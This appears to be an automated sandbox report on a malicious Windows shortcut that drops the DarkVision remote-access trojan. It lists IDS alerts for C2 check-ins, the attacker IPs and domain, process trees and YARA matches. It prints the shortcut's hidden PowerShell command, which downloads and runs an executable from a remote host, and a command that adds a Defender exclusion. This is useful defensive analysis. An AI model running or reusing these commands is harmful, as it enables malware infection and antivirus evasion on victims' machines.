                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49880 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49888 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.10:49880 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49893 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49903 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49909 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49986 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.10:49986 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49993 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49996 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49992 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49994 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49997 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49998 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49999 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:50001 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:50003 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:50006 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.10:49997 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:50007 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:50000 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.10:50003 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49995 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:50002 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:50004 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:50005 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:49898 -> 87.121.86.214:3441
                            Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.10:50008 -> 87.121.86.214:3441
                            System process connects to network (likely due to code injection or exploit)
                            Source: C:\Windows\explorer.exeNetwork Connect: 87.121.86.214 3441Jump to behavior
                            Uses dynamic DNS services
                            Source: unknownDNS query: name: freespace2384.duckdns.org
                            Source: global trafficTCP traffic: 192.168.2.10:49762 -> 87.121.86.214:3441
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Fri, 27 Dec 2024 08:20:06 GMTAccept-Ranges: bytesETag: "f5f52a233858db1:0"Server: Microsoft-IIS/8.5Date: Fri, 27 Dec 2024 13:53:40 GMTContent-Length: 4312064Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1f 20 61 b4 5b 41 0f e7 5b 41 0f e7 5b 41 0f e7 34 37 a4 e7 5f 41 0f e7 40 dc 91 e7 51 41 0f e7 52 39 8c e7 58 41 0f e7 52 39 88 e7 5a 41 0f e7 52 39 9c e7 52 41 0f e7 5b 41 0e e7 25 41 0f e7 40 dc a4 e7 1c 41 0f e7 40 dc a5 e7 32 41 0f e7 40 dc 95 e7 5a 41 0f e7 40 dc 92 e7 5a 41 0f e7 52 69 63 68 5b 41 0f e7 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 4d e4 36 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 7c 03 00 00 e8 03 00 00 00 00 00 00 d0 41 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 42 00 00 04 00 00 eb 25 42 00 02 00 40 80 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8d 90 07 00 b5 00 00 00 00 80 07 00 f0 02 00 00 20 e0 41 00 40 1d 00 00 00 00 00 00 00 00 00 00 f8 91 07 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 07 00 00 10 00 00 00 70 07 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 02 00 00 00 80 07 00 00 04 00 00 00 80 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 07 00 00 02 00 00 00 84 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 67 76 70 6f 62 6a 72 79 00 30 3a 00 00 a0 07 00 00 26 3a 00 00 86 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 61 71 70 74 65 6e 71 00 10 00 00 00 d0 41 00 00 02 00 00 00 ac 41 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 70 64 61 74 61 00 49 00 20 00 00 00 e0 41 00 00 1e 00 00 00 ae 41 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: Joe Sandbox ViewASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG
                            Source: Joe Sandbox ViewASN Name: SKATTV-ASBG SKATTV-ASBG
                            Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 87.120.113.91:80 -> 192.168.2.10:49721
                            Source: global trafficHTTP traffic detected: GET /image.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 87.120.113.91Connection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.113.91
                            Source: C:\Windows\explorer.exeCode function: 14_2_02F74D00 recv,14_2_02F74D00
                            Source: global trafficHTTP traffic detected: GET /image.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 87.120.113.91Connection: Keep-Alive
                            Source: global trafficDNS traffic detected: DNS query: freespace2384.duckdns.org
                            Source: powershell.exe, 00000000.00000002.1466537261.0000025A80C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.113.91
                            Source: powershell.exe, 00000000.00000002.1466537261.0000025A81C62000.00000004.00000800.00020000.00000000.sdmp, LPO-0048532025.lnkString found in binary or memory: http://87.120.113.91/image.exe
                            Source: powershell.exe, 00000000.00000002.1500121641.0000025A901BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1500121641.0000025A90078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 00000000.00000002.1466537261.0000025A80232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000000.00000002.1466537261.0000025A80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 00000000.00000002.1466537261.0000025A80232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 00000000.00000002.1516784530.0000025AE89C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                            Source: powershell.exe, 00000000.00000002.1466537261.0000025A80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: powershell.exe, 00000000.00000002.1500121641.0000025A90078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 00000000.00000002.1500121641.0000025A90078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 00000000.00000002.1500121641.0000025A90078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: powershell.exe, 00000000.00000002.1466537261.0000025A80232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: powershell.exe, 00000000.00000002.1466537261.0000025A80C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                            Source: powershell.exe, 00000000.00000002.1500121641.0000025A901BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1500121641.0000025A90078000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: 20.0.explorers.exe.7ff74afd0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 3.0.file.exe.7ff727cf0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 3.2.file.exe.7ff727cf0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 7.0.explorers.exe.7ff74afd0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 7.2.explorers.exe.7ff74afd0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 20.2.explorers.exe.7ff74afd0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: 14.2.explorer.exe.2f50000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\file.exe, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            Source: C:\ProgramData\explorers\explorers.exe, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                            PE file contains section with special chars
                            Source: file.exe.0.drStatic PE information: section name:
                            Source: file.exe.0.drStatic PE information: section name: .idata
                            Source: explorers.exe.3.drStatic PE information: section name:
                            Source: explorers.exe.3.drStatic PE information: section name: .idata
                            Powershell drops PE file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\file.exeJump to dropped file
                            Windows shortcut file (LNK) contains suspicious command line arguments
                            Source: LPO-0048532025.lnkLNK file: -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile %TEMP%\file.exe; Start-Process '%TEMP%\file.exe' }"
                            Source: C:\Windows\explorer.exeCode function: 14_2_02F8021C14_2_02F8021C
                            Source: C:\Windows\explorer.exeCode function: 14_2_02F73FF014_2_02F73FF0
                            Source: C:\Windows\explorer.exeCode function: 14_2_02F6DDD014_2_02F6DDD0
                            Source: C:\Windows\explorer.exeCode function: 14_2_02F811C414_2_02F811C4
                            Source: C:\Windows\explorer.exeCode function: 14_2_02F7B57C14_2_02F7B57C
                            Source: C:\Windows\explorer.exeCode function: String function: 02FC2500 appears 58 times
                            Source: 20.0.explorers.exe.7ff74afd0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 3.0.file.exe.7ff727cf0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 3.2.file.exe.7ff727cf0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 7.0.explorers.exe.7ff74afd0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 7.2.explorers.exe.7ff74afd0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 20.2.explorers.exe.7ff74afd0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: 14.2.explorer.exe.2f50000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: C:\Users\user\AppData\Local\Temp\file.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: C:\ProgramData\explorers\explorers.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                            Source: classification engineClassification label: mal100.troj.expl.evad.winLNK@24/17@4/2
                            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{BE5C9BF3-0A41-4A6C-B6A8-511461B7BEF1}.lnkJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                            Source: C:\ProgramData\explorers\explorers.exeMutant created: \Sessions\1\BaseNamedObjects\{58EA08CD-6A42-4A3D-86DA-19E2462E6B2F}
                            Source: C:\ProgramData\explorers\explorers.exeMutant created: \Sessions\1\BaseNamedObjects\{30F0C786-034B-4B0C-94BC-645F40CC8FC6}
                            Source: C:\ProgramData\explorers\explorers.exeMutant created: \Sessions\1\BaseNamedObjects\{0A647628-9B0D-4A3C-87B7-42A365C5741B}
                            Source: C:\Users\user\AppData\Local\Temp\file.exeMutant created: \Sessions\1\BaseNamedObjects\{ACF88517-FED7-4D1C-939E-76796F427EB2}
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sr2ww4iv.0jw.ps1Jump to behavior
                            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\{F507C7EB-0460-419E-BE06-0FA6DFA315DF}\{C0EDD55B-2610-4BC4-A06C-A014DB07F034}.bat" "
                            Source: C:\ProgramData\explorers\explorers.exeProcess created: C:\Windows\explorer.exe
                            Source: C:\ProgramData\explorers\explorers.exeProcess created: C:\Windows\explorer.exeJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                            Source: LPO-0048532025.lnkReversingLabs: Detection: 21%
                            Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                            Source: explorers.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                            Source: explorer.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }"
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe"
                            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'
                            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess created: C:\ProgramData\explorers\explorers.exe "C:\ProgramData\explorers\explorers.exe" {8ACDE7F8-56B2-461C-B2DA-0AAADBA16242}
                            Source: C:\ProgramData\explorers\explorers.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'
                            Source: C:\ProgramData\explorers\explorers.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"
                            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\{F507C7EB-0460-419E-BE06-0FA6DFA315DF}\{C0EDD55B-2610-4BC4-A06C-A014DB07F034}.bat" "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c start "" "C:\ProgramData\explorers\explorers.exe" {8C297CC8-E374-4152-AC22-8BDCBA90B505}
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\explorers\explorers.exe "C:\ProgramData\explorers\explorers.exe" {8C297CC8-E374-4152-AC22-8BDCBA90B505}
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\file.exeProcess created: C:\ProgramData\explorers\explorers.exe "C:\ProgramData\explorers\explorers.exe" {8ACDE7F8-56B2-461C-B2DA-0AAADBA16242}Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'Jump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'Jump to behavior
                            Source: C:\ProgramData\explorers\explorers.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\explorers'Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c start "" "C:\ProgramData\explorers\explorers.exe" {8C297CC8-E374-4152-AC22-8BDCBA90B505}Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\explorers\explorers.exe "C:\ProgramData\explorers\explorers.exe" {8C297CC8-E374-4152-AC22-8BDCBA90B505}Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
